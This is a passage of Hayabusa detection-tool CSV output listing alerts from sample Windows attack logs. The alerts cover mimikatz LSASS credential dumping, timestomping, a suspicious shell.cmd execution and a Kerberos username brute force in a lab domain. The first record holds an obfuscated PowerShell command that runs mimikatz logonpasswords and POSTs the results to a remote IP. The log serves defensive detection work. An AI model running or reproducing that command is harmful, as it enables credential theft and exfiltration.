101, 103,101,58 ,58,100 ,101 , 98,117,103 ,32,115,101,107,117 ,114,108 ,115 ,97 ,58 , 58 , 108, 111 ,103, 111,110, 112 ,97,115 , 115 , 119,111, 114,100 , 115 , 32 , 101, 120 ,105 , 116,39,10 , 36, 114,101 ,113 ,117 , 101, 115 , 116,32,61, 32 , 91 ,83 , 121 , 115,116 ,101, 109 , 46,78, 101,116, 46 ,87,101,98,82,101 , 113 ,117,101 , 115 ,116 ,93, 58 , 58 , 67,114 ,101, 97 , 116, 101 , 40 ,39 ,104,116 ,116 , 112 ,115, 58 , 47 , 47, 49,48 ,46, 50 , 51 , 46 ,49, 50 , 51, 46,49 ,49, 58 , 50,54 , 50,54 , 47 ,39, 41,10 ,36 ,114, 101, 113,117,101 ,115,116 , 46,77, 101,116,104 , 111 , 100 , 32 , 61, 32,39 , 80, 79 , 83,84,39 ,10 , 36 ,114 , 101, 113 , 117 , 101 ,115,116 , 46 ,67,111, 110 , 116, 101, 110,116 ,84,121, 112,101,32 , 61 , 32 ,39 ,97 ,112 ,112 ,108 , 105 , 99,97 , 116, 105 ,111 , 110, 47, 120,45 , 119, 119 , 119 ,45 ,102,111, 114 ,109 ,45,117, 114, 108 , 101 ,110 ,99 , 111,100 , 101 ,100 , 39,10,36,98,121, 116, 101, 115 , 32 , 61 ,32 , 91 , 83, 121 , 115, 116,101 , 109 , 46, 84 ,101, 120 ,116 , 46, 69 , 110, 99 , 111 , 100 ,105 ,110 ,103,93 , 58 ,58, 65 , 83, 67, 73 , 73 , 46 ,71, 101 ,116 ,66 , 121 , 116,101 , 115 , 40 ,36 ,99 , 109 , 100, 41, 10, 36 , 114, 101, 113, 117 , 101, 115, 116, 46, 67 , 111, 110 ,116, 101,110 , 116 , 76, 101, 110,103,116 , 104 , 32, 61 ,32, 36 ,98 ,121,116, 101 ,115 ,46, 76, 101,110,103 ,116, 104,10, 36, 114 , 101, 113 , 117 ,101, 115, 116,83,116 ,114 ,101,97, 109 , 32,61 , 32 ,36, 114,101 ,113 , 117 , 101 , 115 , 116,46 , 71, 101, 116,82,101,113 ,117,101, 115 ,116 ,83, 116,114, 101, 97,109 , 40,41, 10, 36,114 , 101 , 113, 117, 101 ,115 , 116 , 83,116 ,114 , 101 , 97 ,109 , 46, 87,114 ,105 ,116,101,40,36 , 98 , 121 ,116 , 101 , 115 ,44,32 ,48 ,44, 32, 36 ,98, 121,116,101 ,115 , 46, 76 , 101,110 ,103,116, 104, 41 , 10 , 36,114,101,113 , 117,101 , 115, 116,83,116,114 , 101, 97 , 109 , 46,67, 108,111 ,115,101 , 40 ,41 , 10 , 36, 114 ,101, 113, 117, 101,115 , 116 , 46, 71 , 101 ,116,82 ,101 , 115, 112 ,111 , 110,115,101, 40 ,41) | % { ( [ChaR][InT]$_) } ) +""$(sEt-iTeM 'vArIaBLE:ofS' ' ' ) "" ) "" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x90c | User: admmig | LID: 0x8157bac",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:45.843 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x214 | User: FS03VULN$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-25 00:48:24.985 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx 2021-11-25 00:48:25.000 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx 2021-11-28 00:47:00.365 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx 2021-11-28 00:47:00.369 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx 2021-12-01 07:05:47.229 +09:00,fs03vuln.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Image: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\287ded39f444f2847a5175b4bf51f9c9\System.Management.Automation.ni.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Hash: SHA1=4F4193BFF5970968B6EEAD58EB83F9415F32A5C1,MD5=9139657B434F2FA8023775958164DB0C,SHA256=EE9CD13CC38A285D48B00E21CBB11F9CA8C8F435ADF6ADF5281C371DD0A406AA,IMPHASH=00000000000000000000000000000000",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:50.065 +09:00,fs03vuln.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Hash: SHA1=1663A59FF35A01F612C878AB83F2AD242BB46FB6,MD5=FC2036AB90490D8FDFB3B3F3B90AF56F,SHA256=E293B79E4C06E8DEFD95F3CB9B70BA1CC50E83C37930DA802B50066AC6DF0509,IMPHASH=77B4BD4D7F94DBB1235EEE9E8C0737DC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:50.065 +09:00,fs03vuln.offsec.lan,7,info,Exec,WMI Modules Loaded,,../hayabusa-rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:50.864 +09:00,fs03vuln.offsec.lan,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | tcp | Src: 10.23.42.38:62095 (-) | Dst: 10.23.123.11:443 (-) | User: OFFSEC\admmig | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000",../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:50.864 +09:00,fs03vuln.offsec.lan,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x143a | Src PID: 2668 | Src PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Tgt PID: 480 | Tgt PGUID: A57649D1-92D8-61A4-7191-000000000000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,LSASS Memory Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,../hayabusa-rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:06:02.033 +09:00,fs03vuln.offsec.lan,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | tcp | Src: 10.23.42.38:62096 (-) | Dst: 10.23.123.11:443 (-) | User: OFFSEC\admmig | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000",../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:06:02.033 +09:00,fs03vuln.offsec.lan,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-02 23:48:15.983 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: test1 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:15.983 +09:00,-,-,medium,InitAccess : PrivEsc,Invalid Users Failing To Authenticate From Source Using Kerberos,"[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:46 TargetUserName:sef/srey/admtest/vase/xt/s/ysy/vrat/yvsyv/xc/g/mgdi/rec/vga/ytuntsr/vdr/m,og/b aer/nd/test2/vt/gsdf/dyfgdhbn/tfay/bdcy/sgfg/vs/sfs/uydzry/bsfin/rey/syvsdy/tary/ryver/yvas/vay/tc/ugu/go/test1/xvtrz/ar/nini/tbyt/accrt/wyt IpAddress:::ffff:10.23.123.11 timeframe:24h",../hayabusa-rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos3.yml,- 2021-12-02 23:48:16.298 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admmig | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:16.308 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: test2 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:16.311 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admtest | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:16.338 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: administrator | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:16.338 +09:00,-,-,medium,InitAccess : PrivEsc,Disabled Users Failing To Authenticate From Source Using Kerberos,[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:16 TargetUserName:SM_25e3b4425ffd47aab/SM_27d255b6407743b08/SM_957258b5879242afb/SM_374806bcc65140a5a/SM_2f6964c8f421408ab/krbtgt/Guest/administrator/Administrator/SM_6aaeeb113c0c4af3a/SM_b2a35e76f50a4c23a/Test-ADM/SM_8b9faa99d83446d1b/SM_2b6f1a51ac6c41b2a/DefaultAccount/$P51000-50I28MP5JB3E IpAddress:::ffff:10.23.123.11 timeframe:24h,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos2.yml,- 2021-12-02 23:48:16.342 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:16.956 +09:00,-,-,medium,InitAccess : PrivEsc,Valid Users Failing to Authenticate From Single Source Using Kerberos,[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:22 TargetUserName:HealthMailbox2cfa5bd/svc_adfs01/HealthMailboxf7e4358/HealthMailboxeb3dc3f/proabcdef/domadm/HealthMailboxebdc745/HealthMailboxa935ecd/vuln_scan/HealthMailboxf49e2c8/svc-ata/Svc-SQL-DB01/HealthMailboxa99e1bd/admin-te/svc_nxlog/HealthMailboxdabf0a3/HealthMailboxe8b0d98/adminupn42/HealthMailbox9a2d0da/HealthMailboxc9291f7/HealthMailbox0ab31b3/admin-hacker IpAddress:::ffff:10.23.123.11 timeframe:24h,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos.yml,- 2021-12-02 23:48:17.267 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sgfg | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.271 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: g | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.274 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: dyfgdhbn | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.277 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xvtrz | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.281 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ar | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.284 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tary | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.287 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: bsfin | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.319 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: mgdi | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.323 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vdr | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.327 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tc | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.331 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: syvsdy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.334 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: s | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.337 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ysy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.341 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vrat | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.344 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vay | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.348 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vs | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.351 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: uydzry | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.354 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rey | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.357 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vase | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.360 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ryver | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.363 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: yvsyv | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.367 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: srey | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.370 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: b aer | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.373 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: yvas | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.376 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tbyt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.379 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: nini | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:17.382 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ugu | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: 